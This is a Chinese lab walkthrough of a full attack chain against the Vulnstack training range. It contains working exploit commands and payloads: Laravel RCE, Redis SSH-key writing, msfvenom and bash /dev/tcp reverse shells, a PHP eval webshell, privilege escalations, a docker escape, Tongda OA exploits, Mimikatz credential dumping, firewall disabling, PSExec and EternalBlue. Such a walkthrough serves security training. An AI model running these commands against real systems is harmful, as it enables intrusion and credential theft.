一、环境配置
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/
data:image/s3,"s3://crabby-images/122cc/122cc14344b106fed5596b7a0bc07965dd74f703" alt="请添加图片描述"
DMZ区IP段为192.168.36.1/24
第二层网络环境IP段为192.168.52.1/24
第三层网络环境IP段为192.168.93.1/24
二层、三层无法出网,一层不能出网
按着上面的图片把相关的ip段给配置就行 data:image/s3,"s3://crabby-images/03a52/03a52c77e8d2ce52ddd441a290e9b367dba76247" alt="在这里插入图片描述"
DMZ区域:
给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。
第二层网络区域:
给Ubuntu (Web 2) 和Windows 7 (PC 1)都配置了两个网卡,一个连接第二层网络,一个连接第三层网络。
第三次网络区域:
给Windows Server 2012和Windows 7 (PC 2)都只配置了一个网卡,连接第三层网络。
域用户账户和密码如下:
Administrator:Whoami2021
whoami:Whoami2021
bunny:Bunny2021
moretz:Moretz2021
Ubuntu 1: web:web2021
Ubuntu 2: ubuntu:ubuntu
通达OA账户: admin:admin657260
配好之后再启动web环境:
DMZ区的 Ubuntu 需要启动nginx服务:
sudo redis-server /etc/redis.conf
sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf
sudo iptables -F
第二层网络的 Ubuntu需要启动docker容器:
sudo service docker start
sudo docker start 8e172820ac78
第三层网络的 Windows 7 (PC 1)需要启动通达OA:
C:\MYOA\bin\AutoConfig.exe
二、外网打点
这肯定得祭出我的nmap开干对192.168.36.128 进行扫描
nmap -sV -p 1-65535 192.168.36.128
data:image/s3,"s3://crabby-images/f4c71/f4c7116c38b1dec8affd3b2d501050845a4c68c2" alt="在这里插入图片描述"
有80、81 nginx服务 然后6379 redis数据库,我们先从80、81端口下手
www.whopen.com 域名对应的192.168.36.128:80 data:image/s3,"s3://crabby-images/05c0e/05c0e67be6476b9478995da20f073c00705c4345" alt="在这里插入图片描述"
192.168.36.128:81对应的是Laravel v8.29.0 (PHP v7.4.14)
data:image/s3,"s3://crabby-images/08fe2/08fe2c0af275ab5c5496603325c0486673132298" alt="在这里插入图片描述"
Laravel Debug RCE(CVE-2021-3129)
当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。这里直接使用工具 getshell,工具下载地址: https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
data:image/s3,"s3://crabby-images/c4ce4/c4ce468c93c059663e052101fa8c4e20e96097f1" alt="在这里插入图片描述" webshell地址:http://192.168.36.128:81/fuckyou.php,密码:pass 直接哥斯拉连接嗷,然后这里注意要使用哥斯拉 v2.92 版本 data:image/s3,"s3://crabby-images/8483c/8483cac5bbbdac18263c92f80a3f6116ba9388c5" alt="在这里插入图片描述" 然后换成植入webshell换成最新哥斯拉搞,这里由于是dokcer环境就先从redis数据下手
redis未授权访问
https://www.cnblogs.com/bmjoker/p/9548962.html
redis-cli -h 192.168.36.128
data:image/s3,"s3://crabby-images/6d170/6d1703f7e2ae8ffc94f4736cef0e5e4a22c36590" alt="在这里插入图片描述"
输入命令info直接回显,本地生成密钥然后覆盖目标主机的密钥,直接淦就完事了嗷 攻击者在未授权访问redis的情况下,利用redis自身提供的config命令,可以进行写文件的操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以使用对于私钥直接使用ssh服务登录目标服务器
ssh-keygen -t rsa #生成公钥
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt #将公钥导入1.txt文件
cat 1.txt | redis-cli -h 192.168.36.128 -p 6379 -x set hello #把1.txt文件内容写入目标主机的redis缓冲中
config set dir /root/.ssh #设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys #设置保存文件名为authorized_keys
save #将数据保存在目标服务器硬盘上
ssh root@192.168.36.128 #连接
data:image/s3,"s3://crabby-images/75e40/75e40c5371a4522c03a1e3b55eb91303338d5a4a" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/b687c/b687cacb23c5de52b81bf4158c3d07b920f4c87d" alt="在这里插入图片描述"
data:image/s3,"s3://crabby-images/dc1d8/dc1d8483f584056e18e0a9a87924cf17083faedb" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/9ebca/9ebcababffc6a63c388d407651b794c3be8b666c" alt="在这里插入图片描述"
data:image/s3,"s3://crabby-images/8f745/8f745553e6a649e64e58cc934bcbae20463d9a9b" alt="在这里插入图片描述" 拿下DMZ第一层ubuntu机器让上线到msf
上线ubuntu web1
生成一个msf的shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.36.129 LPORT=6666 -f elf > ubuntu.elf
然后上传到网站上去,让ubuntu去下载这个shell直接上线 data:image/s3,"s3://crabby-images/8aa34/8aa3438c805e534a0c5b36b560662755592872b8" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/2e4ec/2e4ece7c5db22569365cd5af6bf205c92475841e" alt="在这里插入图片描述"
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.36.129
set lport 6666
run
chmod +x ubuntu.elf
./ubuntu.elf
data:image/s3,"s3://crabby-images/077f8/077f864c36b7964f01c77303c4f0917c522373c9" alt="在这里插入图片描述" 成功上线ubuntu web1
添加路由
run get_local_subnets data:image/s3,"s3://crabby-images/7ba30/7ba3008853652ce8e6055ee3fe4258ccd388606d" alt="在这里插入图片描述" run autoroute -p data:image/s3,"s3://crabby-images/3b126/3b12685edf12bd78f8e1af5f44906fa4d17722c8" alt="在这里插入图片描述" run post/multi/manage/autoroute data:image/s3,"s3://crabby-images/2b7fa/2b7fab85bf27332131a4e2147e710931d568d978" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/e6040/e6040e26b7e0005c4f96d27f66fa4e019c2d041c" alt="在这里插入图片描述"
二层内网信息收集
nmap -sn -PE -T4 192.168.52.0/24
data:image/s3,"s3://crabby-images/64742/6474243138556f280bf9773d684f505695c1363b" alt="在这里插入图片描述" 发现有192.168.52.20、192.168.52.30,接着对192.168.52.20下的docker下手,因为ubuntu web1负责开启环境对外网开放,而getshell的机器是的ubuntu web2代理的web环境,并且ubuntu web2不出网
linux环境变量提权
PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上执行任何命令时,它会通过PATH变量来响应用户执行的命令,并向shell发送请求以搜索可执行文件。超级用户通常还具有/sbin和/usr/sbin条目,以便于系统管理命令的执行。 参考:https://www.freebuf.com/articles/system/173903.html https://blog.csdn.net/weixin_49340699/article/details/118801756
当前用户为 www-data,所以尝试提权(可能是 docker 环境的原因,内核提权失败),枚举具有SUID权限的所有二进制文件,发现 /home/jobs/shell
find / -perm -u=s -type f 2>/dev/null #\
data:image/s3,"s3://crabby-images/18eeb/18eeb00a03fc1d94c5da4e78203eba45d79d8a33" alt="在这里插入图片描述"
./shell
data:image/s3,"s3://crabby-images/31daa/31daacea24cbbf4e6926c0e4dbf5e21e32f207f0" alt="在这里插入图片描述"
cp /bin/bash /tmp/ps
ls /tmp
data:image/s3,"s3://crabby-images/defea/defeab9755fa50e1d3b27fb451ff5caa84ae30fd" alt="在这里插入图片描述"
echo $PATH
export PATH=/tmp:$PATH #将/tmp添加到环境变量中,并且先加载执行/tmp里的程序
data:image/s3,"s3://crabby-images/49472/49472b3a15d11b90b0d574dbeede73a12ef8914f" alt="在这里插入图片描述" 这里由于是docker环境,需要先把shell反弹到ubuntu1再执行操作
nc -lvp 1234
data:image/s3,"s3://crabby-images/58046/58046d4cf59b0d4b1172632c4b068ba2d1898ee6" alt="在这里插入图片描述"
webshell:bash -c 'exec bash -i >& /dev/tcp/192.168.52.10/1234 0>&1'
data:image/s3,"s3://crabby-images/532c2/532c21829d4b25b8206f1dab84ac464e4b8b457b" alt="在这里插入图片描述" 更改$PATH来执行恶意程序,从而获得目标主机的 root 权限 shell data:image/s3,"s3://crabby-images/6567e/6567e74a21453b3ce4185eaa5d55e469900a146a" alt="在这里插入图片描述"
data:image/s3,"s3://crabby-images/77e73/77e730d9671f4a4605a16f611a318dbafa7b4afa" alt="在这里插入图片描述"
docker特权模式逃逸
特权模式于版本 0.6 时被引入 docker,允许容器内的 root 拥有外部物理机 root 权限,而此前容器内 root 用户仅拥有外部物理机普通用户权限使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行 docker run —privileged 时,docker 容器将被允许访问主机上的所有设备,并可以执行 mount 命令进行挂载当控制使用特权模式启动的容器时,docker 管理员可通过 mount 命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令 把 Laravel 的高权限 shell(192.168.52.20)再反弹到 ubuntu 18(192.168.52.10)中
判断是否为docker 环境
1、使用下面命令,查看是否存在 dockerrnv 文件
ls -alh /.dockerenv
2、查看系统进程的cgroup信息
cat /proc/1/cgroup
data:image/s3,"s3://crabby-images/559fc/559fcb4658cbd4bab7354c2272bbcc4c4384ef95" alt="在这里插入图片描述"
首先查看一下磁盘文件和设备文件,发现有三个磁盘文件和很多个设备文件,将 /dev/sda1 挂载到自己创建的文件夹
fdisk -l #查看磁盘文件
ls /dev #查看设备文件
cd /
mkdir hello
mount /dev/sda1 /hello
ls /hello
将密钥写入到 /hello/home/ubuntu/.ssh 目录中的 authorized_keys 文件中,写入成功之后就可以使用该密钥登陆该机器(192.168.52.20)
覆盖密匙:
cp -avx /hello/home/ubuntu/.ssh/id_rsa.pub /hello/home/ubuntu/.ssh/authorized_keys #-avx将权限也一起复制
echo > /hello/home/ubuntu/.ssh/authorized_keys #清空authorized_keys文件
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC88a9qlJi9Th92Z3hi1DqsGlB7c+Z8hyz4NL7/grYWLzBi+Ei2jVDxh4xyyauoNi7xQmx2frROC7Pa8q3Hqfnbet4X077lIYJPK0/XKJ4K71rC76OCIUJEdKHoC+TX/XBySWa9j6QJm8G/q5xUpTmkAHRd92UZthp6rUZgMVr8VTrQuFkAkAADwM9dLm3p2A2pHNt5RXHorqKy2W4A0U25ERzvm4NY4tyfryb9cGXotY5bY9xOdBXdB5ccu9IvMQrYDarUGukB5gPj06Rk2KCKdGHvbTtVV6HZ3mJIa76jhGMgmYX5DlLM9GrhsEzm6btZ2nfp6Icmp8x/LItv2iSL root@ubuntu' > /hello/home/ubuntu/.ssh/authorized_keys #将ssh秘钥写入authorized_keys文件
cat /hello/home/ubuntu/.ssh/authorized_keys #查看是否写入成功
生成自己的 ssh 密钥(192.168.52.10)
ubuntu Pc 1生成:
ssh-keygen -f hello
chmod 600 hello
ls
cat hello.pub
ssh -i hello ubuntu@192.168.52.20 #指定本地密钥登录
data:image/s3,"s3://crabby-images/b3e66/b3e66e17a8c10c5c6ffe09a9a69fff30b4b10031" alt="在这里插入图片描述"
上线ubuntu web2
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=7777 -f elf -o ubuntu2.elf
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhosts 192.168.52.20
set lport 7777
run
上传shell data:image/s3,"s3://crabby-images/683ce/683cecdab10743c2c0e28238b8e3d750ebdfe5f1" alt="在这里插入图片描述"
data:image/s3,"s3://crabby-images/a61a4/a61a43a715ac800863ea94d90d0e8b1bbc39d8a6" alt="在这里插入图片描述"
ubuntu2执行
wget http:
chmod +x p2.elf
./p2.elf
data:image/s3,"s3://crabby-images/26be1/26be1b2c38a54421926ab84cdfb72bf6c6f6140b" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/82ffe/82ffe6ca62a3e951720f7489a210dbb52237b761" alt="在这里插入图片描述"
CVE-2021-3493
当前登录用户是 ubuntu,查看系统信息,发现服务器在 cve-2021-3493 内核提权漏洞影响版本内
漏洞原理:Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特权
参考:https://blog.csdn.net/qq_45688822/article/details/115999519 data:image/s3,"s3://crabby-images/35eca/35eca0844651f5fbe80f5d9473c251c54404efe5" alt="在这里插入图片描述"
漏洞影响版本:
Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM
提权工具:https://github.com/briskets/CVE-2021-3493
cd /tmp
gcc exploit.c -o exploit
chmod +x exploit
./exploit
data:image/s3,"s3://crabby-images/ab9fa/ab9faadb57e683794549934058ec15e3b3bc1a4d" alt="在这里插入图片描述"
三、横向移动
配置代理&&添加路由 data:image/s3,"s3://crabby-images/827c7/827c749868c967f622754df60a016a827d387bf2" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/2afd7/2afd75b4793ef22d06f43f17aa7d8a8e9c1e8e5e" alt="在这里插入图片描述"
对192.168.52.30进行识别
nmap -sV 192.168.52.30
data:image/s3,"s3://crabby-images/09bf9/09bf9c6eee8796fdaa96a5b3bc7a05acb4fa4d7f" alt="在这里插入图片描述"
通达OA前台任意用户登录漏洞+RCE漏洞复现
任意用户登录:影响版本:通达OA2017,V11.X<V11.5 通达oa远程命令执行:影响的版本有:V11版,2017版,2016版,2015版,2013增强版,2013版。 参考:https://blog.csdn.net/szgyunyun/article/details/107104288 1、任意用户登录
登录处抓包
POST /logincheck_code.php HTTP/1.1
Host: 192.168.52.30:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*
需修改以下三个地方:
/logincheck.php /logincheck_code.php
删除cookie在post包中添加UID=1
data:image/s3,"s3://crabby-images/8a723/8a723d21dae63be31e37ba18e74b86c8287508e3" alt="在这里插入图片描述" 用获取的SESSID访问/general/ 就行
2.未授权文件上传 任意文件上传漏洞 /ispirit/im/upload.php
POST /ispirit/im/upload.php HTTP/1.1
Host: 49.233.3.2:8888
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: *
data:image/s3,"s3://crabby-images/72e22/72e22aa7099f79dfbbca0410530405c7153c0452" alt="在这里插入图片描述"
文件包含
POST /ispirit/interface/gateway.php HTTP/1.1
Host: 192.168.52.30:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: *
data:image/s3,"s3://crabby-images/b3b24/b3b24e8740f0aebeb7efcbd37ede3f5385abaa1e" alt="在这里插入图片描述"
上线Pc1
方法一: 在目标网站生成shell data:image/s3,"s3://crabby-images/bdcef/bdcef88111fb97dba89ae6a014d0a6841d93d6f6" alt="在这里插入图片描述"
<?php fputs(fopen('../../shell.php','w'),'<?php @eval($_POST["test"])?>');?>
data:image/s3,"s3://crabby-images/767ad/767ad53c037e5610029ea09098c80ee80926fd0d" alt="在这里插入图片描述"
蚁剑连接 data:image/s3,"s3://crabby-images/23f68/23f68b18884733aa9251dd76713791c0b72c93ea" alt="在这里插入图片描述" 直接上传msf的shell进行连接
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe > msf.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.52.30
set lport 4444
data:image/s3,"s3://crabby-images/f1a7c/f1a7ca590ef63adcba3ac8712e0ba61db4bb08fc" alt="在这里插入图片描述" 上线pc1 data:image/s3,"s3://crabby-images/fe112/fe1129150b6303a1808679f09e931ad09840542b" alt="在这里插入图片描述"
方法二:
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe > msf.exe
下载:certutil -urlcache -split -f http:
执行:C:/msf.exe
data:image/s3,"s3://crabby-images/f657d/f657d9cad57fdb748786e8d63a9a9465bce5f65c" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/cc079/cc0792254c6af8c61c897fbea406d5d62875ed4a" alt="在这里插入图片描述"
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.52.30
set lport 4444
data:image/s3,"s3://crabby-images/8d5ea/8d5eab475995f4a7eb38448f6f6df00f51fbee61" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/269d3/269d343cf9708687a4b48ab66f0398c31a23281b" alt="在这里插入图片描述"
kiwi模块 使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonpasswords
migrate 5104
kiwi_cmd sekurlsa::logonpasswords
data:image/s3,"s3://crabby-images/076bd/076bdb6c2a22d2b383c273e5781344f4255f8749" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/23c7c/23c7c1160bc8f923032a87837d184d6abf89da87" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/f8253/f82533875d45bb1c70b1bf651eaa9aad1de82c85" alt="在这里插入图片描述"
三层网络信息收集
ipconfig /all # 查看本机ip,所在域
systeminfo # 列出系统信息
route print # 打印路由信息
net view # 查看局域网内其他主机名
arp -a # 查看arp缓存
whoami
net start # 查看开启了哪些服务
net share # 查看开启了哪些共享
net config workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain # 查看域中某工作组
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "domain controllers" /domain # 查看域控制器(可能有多台)
nmap -sn -PE -T4 192.168.93.0/24
data:image/s3,"s3://crabby-images/7b192/7b192c71e608faf0c19644ae61f10053ba17397d" alt="在这里插入图片描述" 扫描到有192.168.93.30 、192.168.93.40
定位域控 data:image/s3,"s3://crabby-images/d2ce4/d2ce45700ce7a05c250aa3cd9cee19a00da20a5a" alt="在这里插入图片描述"
上线域控DC
关闭防火墙后利用模块上线:
shell
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall
data:image/s3,"s3://crabby-images/0ebfc/0ebfca5cba72146ac636bd6ec10f2357fe64bfcf" alt="在这里插入图片描述" PSExec工具 使用PSExec前提:SMB服务必须开启以及可达。文件和打印机共享必须开启,禁止简单文件共享。 Admin$ 必须可以访问。PSExec使用的口令必须可以访问Admin$ 共享。 在PSExec可执行文件中含有一个Windows服务。它利用该服务并且在远端机器上部署Admin$ 。然后通过SMB使用DCE/RPC接口来访问Windows Service Control Manager API。然后在远程主机中开启PSExec访问。然后PSExec服务创建一个命名管道,用它来发送命令。 exploit/windows/smb/psexec exploit在可执行文件中生成/嵌入一个payload,其本质是用过PSExec工具上传的一个服务image。然后exploit使用提供的口令来把服务可执行文件上传到Admin$中,连接到DEC/RPC接口,然后在告诉SCM启动我们部署的服务之前调用Service Control Manager。当服务启动后,创建一个rundll32.exe进程,在进程中分配可执行内存,然后把shellcode拷贝到进程中。然后调用内存地址,执行shellcode。 可执行文件由模板生成,可以由杀毒软件发现。
抓取到域管理员的密码了,直接psexec登陆
exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
set smbuser administrator
set smbpass Whoami2021
data:image/s3,"s3://crabby-images/bac20/bac2056c7b38f4eb52c2ead60aa66a000ac65212" alt="在这里插入图片描述"
上线Pc2
这里可以直接打一波永恒之蓝
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.93.40
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.93.40
set lport 4444
exploit
data:image/s3,"s3://crabby-images/93639/93639c77973eaf2dfda9f2f1db71487d9e6d342d" alt="在这里插入图片描述"
wmiexec smb登录
wmi 出现在所有的 windows 操作系统中,由一组强大的工具集合组成,用于管理本地或远程的 windows 系统。攻击者使用 wmi 攻击时 windows 系统默认不会在日志中记录这些操作,可以做到无日志、攻击脚本无需写入到磁盘,增加了隐蔽性。
wmiexec 执行命令,搜集信息,参考:wmiexec.py 下载地址:https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
python3 wmiexec.py -debug 'administrator:Whoami2021@192.168.93.40'
data:image/s3,"s3://crabby-images/4d449/4d4494a6385d6f8ccde9c33025c0c45c093c06e1" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/eae81/eae81445486dba80124b8b6f6807db6d9fc9c292" alt="在这里插入图片描述" 后续就不操作了,思路有一点点乱、至此渗透结束 data:image/s3,"s3://crabby-images/36c7f/36c7fbe56a009c9e91e66338da2cb1b946b1c821" alt="在这里插入图片描述"
参考的大佬们博客: https://www.cnblogs.com/wkzb/p/14877913.html https://xz.aliyun.com/t/9574 https://www.freebuf.com/articles/network/264560.html
本文仅作靶场实战教程,禁止将本文演示的技术方法用于非法活动,违者后果自负。
|